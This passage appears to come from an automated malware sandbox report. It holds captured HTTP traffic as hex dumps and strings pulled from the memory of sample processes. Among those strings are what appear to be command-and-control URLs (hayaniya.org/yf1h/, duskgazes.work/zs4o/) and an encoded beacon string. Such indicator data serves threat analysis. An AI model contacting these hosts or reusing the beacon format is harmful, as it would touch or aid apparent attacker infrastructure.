MHJ0GXi=uFsbYKxiJxYpgJe5dXEFpE2IgPXGny2xyu51PXSdhFkIjzb0OT6+Lll5m5UYzQBqf6kNROUavV7sOobhimK0eknIAk+il6aenMIv8dPC12JNep062/p5LYteoniDVl15gEgDyEl+28AXQo32u0HzSKoxyrQq8fbCSdgj9liC1ZRVlLzlEgGciJZQY1555vILxVX1aOzpr9PRoUKSkg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:16:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Sat, 11 Jan 2025 03:17:00 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | keep-alive: timeout=5, max=100 | content-type: text/html | transfer-encoding: chunked | content-encoding: gzip | vary: Accept-Encoding | date: Sat, 11 Jan 2025 03:17:03 GMT | server: LiteSpeed | x-turbo-charged-by: LiteSpeed | connection: close
1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 03:17:05 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 44 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 
1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sat, 11 Jan 2025 03:17:08 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 44 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 
3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:17:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 
f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:17:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 
f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:17:32 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 
f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: systray.exe, 00000017.00000002.2512922275.0000000005DA6000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.0000000002E16000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: n2pGr8w21V.exe, uEugNEto.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: n2pGr8w21V.exe, uEugNEto.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: systray.exe, 00000017.00000002.2512922275.00000000060CA000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000313A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM
                Source: n2pGr8w21V.exe, uEugNEto.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
                Source: n2pGr8w21V.exe, 00000000.00000002.1373842326.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, uEugNEto.exe, 00000011.00000002.1522692999.00000000030C8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ISaSZznjXcpoJ.exe, 00000018.00000002.2513591894.0000000004D2C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.duskgazes.work
                Source: ISaSZznjXcpoJ.exe, 00000018.00000002.2513591894.0000000004D2C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.duskgazes.work/zs4o/
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
